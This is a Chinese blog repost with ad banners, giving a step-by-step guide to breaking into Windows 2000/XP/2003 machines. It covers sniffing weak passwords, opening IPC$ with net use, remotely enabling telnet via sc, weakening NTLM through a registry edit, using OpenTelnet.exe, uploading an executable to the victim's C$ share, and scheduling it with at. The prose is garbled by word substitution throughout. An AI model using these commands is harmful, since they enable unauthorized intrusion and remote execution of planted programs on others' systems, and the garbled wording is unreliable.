GPS平台、网站建设、软件开发、系统运维,找森大网络科技!
http://cnsendnet.taobao.com
来自森大科技官方博客
http://www.cnsendblog.com/index.php/?p=683

我看是很有用的 人人试试看 以前都是看人人上传的知识 ,我现在也为人人服务点
1 首先用流光嗅探获得对方密码,主要是弱口令,强壮密码需要一个很好的密码字典和机械性能以及网络速率以及耐心和运气,呵呵。
2 用net use下令确立ipc$毗邻 例如:net use \ip\ipc$ "" /user:administrator
3 用sc下令把禁用的telnet服务酿成自动 sc \ip config tlntsvr start= auto
4 用sc下令将telnet启动 sc \ip start tlntsvr
5 telnet登录 telnet ip
6 net share 确立c$共享 net share sharename=drive:path
7 copy下令上传*** copy a.exe ip\c$
8 at下令准时执行 at \ip time cmd

 注重:若是对方采用了NTLM认证计谋,可以毗邻网络注册表修改HKEYLOCAL\    MACHINE\SOFTWARE\MICROSOFT\TELNETSERVER\1.0下的NTLM键值由2改为0。

然后重新启动telnet服务。

有些同伙喜欢使用opentelnet远程开启telnet,实在原理一样,要害的问题照样要在之前获得帐户和密码。
OpenTelnet.exe是用来启动远程服务器的Telnet的工具软件,是一个***工具,许多网站有下载。
Opentelnet.exe的用法:
OpenTelnet.exe \server <帐号> <密码> <NTLM认证方式> <Telnet端口>
好比下面的:(下令意思是毗邻192.168.1.2,帐号administrator,密码123456 ,0示意不使用NTLM认证方式,
Telnet的端口是90)
C:\>OpenTelnet.exe \ip administrator 123456 0 90
当程序运行后获得:
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
就说明Telnet服务启动乐成,而且使用的端口是90。这样,我们就能够获得一个开90端口的Windows 2000
Telnet服务
有几个小问题要注重一下:
1 在xpsp2当中,默认的内陆安全计谋中,已经设置了网络接见模式为“仅来宾”,而在帐户治理中,guest帐户是被禁用的。
2 在win03当中,默认的内陆安全计谋中,已经设置了网络接见模式为“经典”,而帐户治理中,guest帐户仍然是禁用的。
3 在使用net use下令的时刻,往往是毗邻ipc$,需要有用户名和密码,以是不管是xp照样03中,需要把计谋设置为经典。
4 检查一下共享,ipc$等等是否已经开启

*****2003中开启许多服务*
使用SC下令远程开启计算机的服务
SC实在是一个下令工具而已,它具备开启计算机服务的功效,早期都把它认为是***工具,而在Windows 2003中将这个下令内置在操作系统中,可以使用它远程开启其他计算机的服务,包罗了系统上已经禁用的服务
下面先容该工具的使用,开启远程主机192.168.1.202的telnet服务(需要知道该主机的用户名和密码):
1.首先使用sc \192.168.1.202 query tlntsvr来查看远程主机的telnet的服务状态,获得结果是stopped(已住手)

2.然后使用sc \192.168.1.202 qc tlntsvr 查询当前的telnet服务的设置状态,发现是disabled(已禁用)

3.使用sc \192.168.1.202 config tlntsvr start= auto使telnet服务开机自动启动

4.使用sc \192.168.1.202 qc tlntsvr 查询经由设置的telnet服务是否已经发生改变,已经成为auto_start(自动启动)

5.使用sc \192.168.1.202 start tlntsvr 来启动telnet服务

6.使用sc \192.168.1.202 query tlntsvr 查看telnet服务是否已经在运行

7.接下来就可以使用telnet 192.168.1.202举行telnet了

GPS平台、网站建设、软件开发、系统运维,找森大网络科技!
http://cnsendnet.taobao.com
来自森大科技官方博客
http://www.cnsendblog.com/index.php/?p=683